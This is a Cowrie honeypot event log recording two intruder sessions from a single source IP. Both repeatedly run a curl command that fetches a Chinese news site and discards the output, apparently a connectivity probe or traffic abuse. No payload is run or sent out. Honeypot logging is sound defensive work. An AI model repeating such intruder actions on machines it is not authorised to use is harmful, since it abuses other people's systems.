{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.808630Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.810496Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.815005Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.816194Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.822488Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.823708Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.866073Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.874878Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.876110Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.891972Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.894104Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.915197Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.923804Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.925041Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.934215Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.935318Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.955625Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.959656Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.960802Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.971804Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.973022Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.996121Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.997613Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.001593Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.002804Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.023212Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.024404Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.036587Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.040583Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.041795Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.060876Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.062013Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.075886Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.077178Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.082303Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.083751Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.103631Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.104948Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.112625Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.113702Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.136153Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.138043Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.153788Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.155327Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.158776Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.161078Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.162050Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.198212Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.200276Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.206367Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.207698Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.210237Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.211296Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.249419Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.250995Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.253688Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.254760Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.258067Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.258930Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.296328Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.297494Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.299994Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.300995Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.310401Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.341310Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.342654Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.347090Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.348304Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.363236Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.364800Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.407229Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.428193Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.429433Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.432688Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.433575Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.475231Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.476405Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.478416Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.479575Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.513459Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.514722Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.517113Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.518232Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.557359Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.558632Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.561160Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.562098Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.579795Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.595672Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.596901Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.599581Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.600671Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.624540Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.641286Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.642379Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.645330Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.646445Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.654389Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.666352Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.727304Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.728670Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.732371Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.733177Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.766154Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.789081Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.790315Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.792580Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.793566Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.811733Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.812912Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.856187Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.881671Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.882995Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:49.887123Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.888185Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:49.899440Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
